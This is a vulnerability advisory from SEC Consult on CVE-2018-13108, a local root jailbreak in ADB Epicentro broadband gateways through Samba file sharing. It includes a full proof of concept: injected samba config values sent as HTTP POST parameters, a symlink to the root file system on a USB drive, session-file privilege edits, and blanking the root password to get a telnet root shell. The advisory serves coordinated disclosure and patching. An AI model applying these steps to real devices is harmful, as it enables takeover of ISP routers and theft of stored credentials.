Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways

Project Description

All ADB broadband gateways / routers based on the Epicentro platform used by many telecommunication providers (ISPs) world-wide are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device and extract further information such as sensitive configuration data of the ISP (e.g. VoIP credentials) or attack the internal network of the ISP.

Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability:
Authorization Bypass in all ADB Broadband Gateways / Routers
Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers


Vendor description

“ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies.”

Source: https://www.adbglobal.com/about-adb/

“Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions.”

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation

By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges. Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures.

Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description

1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)

Most ADB devices offer USB ports in order for customers to use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks e.g. via FTP server functionality which has been fixed in more recent firmware versions.

The “Network File Sharing” feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon within the smb.conf on the device has set “wide links = no” which normally disallows gaining access to the root file system of the device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba configuration file parsing problem which makes it possible to access the root file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session information of the web server in order to escalate web GUI privileges and start a telnet server and gain full system level shell access as root.

This is a local attack and not possible via remote access vectors as an attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices hence this attack is quite problematic for further internal attacks. It is possible to change network routes and attack networks and systems within the internal network of the ISP or add backdoors or sniffers to the device. Furthermore, attackers are able to gain access to all stored credentials, such as PPP, wireless, CPE management or VoIP passwords.

Proof of concept

1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)

The samba configuration file (smb.conf) of the ADB devices has set the following default settings. All file system operations will be performed by the root user as set in the “force user” / “force group” setting of the exported share:

    [global]
    netbios name = HOSTNAME 
    workgroup = WORKGROUP
    wide links = no
    smb ports = 445 139
    security = share
    guest account = root
    announce version = 5.0
    socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536
    null passwords = yes
    name resolve order = hosts wins bcast
    wins support = yes
    syslog only = yes
    read only = no
    hosts allow =  192.168.1.1/255.255.255.0
    [share]
    path = /mnt/sdb1/.
    read only = false
    force user = root
    force group = root
    guest ok = yes

An attacker can edit various values such as “netbios name” and “workgroup” via the web GUI. The web GUI does some basic filtering and newlines are unfortunately not allowed (the samba config file is line-based) hence a special bypass has been crafted in order to change the default setting “wide links = no” to “wide links = yes”. This enables symlinks to the root file system.

By using the following netbios name and workgroup, samba can be tricked into allowing symlinks to the root file system of the device:

netbios domain / workgroup = =wide links = yes \ \
netbios name = wide links = yes \

Relevant HTTP POST parameters:

&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C

According to the manpage of smb.conf, any line ending in a \ is continued by the samba parser on the next line. Furthermore, it states that “Only the first equals sign in a parameter is significant.” – which it seems can be bypassed by adding a backslash \. The parser now thinks that the “wide links = yes” has been set and omits the hardcoded “wide links = no” which comes further down below in the smb.conf file.

In order to add those special values within the web GUI a proxy server such as burp proxy is needed because of basic input validation on the client side (not server side).

The USB drive needs to be formatted to ext2 or ext3 which is supported by the ADB device. Then create a symlink to the root file system via the following command on the attacker’s computer:

ln -s / /path/to/usbdevice/rootfs

After those settings have been changed and the USB drive has been set up, the USB drive can be inserted into the ADB device. The USB volume needs to be exported (with read/write permissions) as a share via the web GUI. Afterwards it can be accessed over the network and the “rootfs” folder example from above will give an attacker access to the ADB root file system with “read & write” access permissions as root.

Most file systems / partitions on the device are mounted read-only per default, but the most important one “/tmp” contains all settings and is mounted writable for operations.

The defaut user “admin” usually has little access rights during normal operations which can be changed by manipulating the session file of the web server within /tmp/ui_session_XXX where XXX is the session id of the currently logged on user, e.g. change:

from: access.dboard/settings/management/telnetserver =|> 2001
to: access.dboard/settings/management/telnetserver =|> 2220
etc. (or change all entries for maximum access level)

This way, an attacker can give himself all/highest access permissions within the GUI and change all the settings of the device! Hence the telnet or SSH server can be started even though they might have been disabled by the ISP. Furthermore, the /tmp/passwd file has to be changed in order to allow root access via shell/telnet:

change: root:*:0:0:root:/root:/bin/ash
to: root::0:0:root:/root:/bin/ash

Now telnet into the device with root and no password. Example of an ADB DV2210 device:

Trying $IP...
Connected to $IP.
Escape character is '^]'.
Login root:

BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.
      ___           ___           ___           ___     
     |\__\         /\  \         /\  \         /\  \    
     |:|  |       /::\  \       /::\  \       /::\  \   
     |:|  |      /:/\:\  \     /:/\:\  \     /:/\:\  \  
     |:|__|__   /::\~\:\  \   /::\~\:\  \   _\:\~\:\  \ 
     /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__\
    /:/~~/~    \/__\:\/:/  / \/__\:\/:/  / \:\ \:\ \/__/
   /:/  /           \::/  /       \::/  /   \:\ \:\__\  
   \/__/            /:/  /         \/__/     \:\/:/  /  
                   /:/  /                     \::/  /   
                   \/__/                       \/__/    
..................................................................
 yet another purposeful solution by             A D B   Broadband
..................................................................
root@$hostname:~# id
uid=0(root) gid=0(root) groups=0(root)
root@$hostname:~# 

Vulnerable / tested versions

The following devices & firmware have been tested which were the most recent versions at the time of discovery.

The firmware versions depend on the ISP / customer of ADB and may vary!

  • ADB P.RG AV4202N – E_3.3.0, latest firmware version, depending on ISP
  • ADB DV 2210 – E_5.3.0, latest firmware version, depending on ISP
  • ADB VV 5522 – E_8.3.0, latest firmware version, depending on ISP
  • ADB VV 2220 – E_9.0.6, latest firmware version, depending on ISP
  • etc.

It has been confirmed by ADB that all their ADB modems / gateways / routers based on the Epicentro platform with USB ports and network file sharing features are affected by this vulnerability in all firmware versions for all their customers (ISPs) at the time of identification of the vulnerability.

Vendor contact timeline

2016-06-15:Contacting vendor ADB, exchanging encryption keys & advisory. Asking about affected devices / firmware, timeline for hotfix. Fast initial response from ADB providing requested information
2016-06-16:Asking about other affected devices
2016-06-17:Resending previous question due to encryption problems
2016-07-04:Conference call
2016-07 – 2017-04:Further coordination, waiting for firmware release, implementation & rollout phases for their customers
2018-07-04:Embargo lifted, public release of security advisory

Solution

The firmware versions depend on the ISP / customer of ADB and may vary!

Patch version:

  • ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
  • ADB DV2210 >= E_5.3.2, firmware version depending on ISP
  • ADB VV5522 >= E_8.3.2, firmware version depending on ISP
  • ADB VV2220 >= E_9.3.2, firmware version depending on ISP
  • Centro Business 1 >= 7.12.10
  • Centro Business 2 >= 8.06.08
  • etc.

Workaround

Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don’t allow remote access to the web GUI via Internet.

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF J. Greil / @2018

Project Details

  • TitleLocal root jailbreak via network file sharing flaw
  • ProductAll ADB Broadband Gateways / Routers (based on Epicentro platform)
  • Vulnerable versionHardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  • Fixed versionsee Solution section
  • CVE numberCVE-2018-13108
  • ImpactCritical
  • Homepagehttp://www.adbglobal.com
  • Found2016-06-09
  • ByJohannes Greil (Office Vienna) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back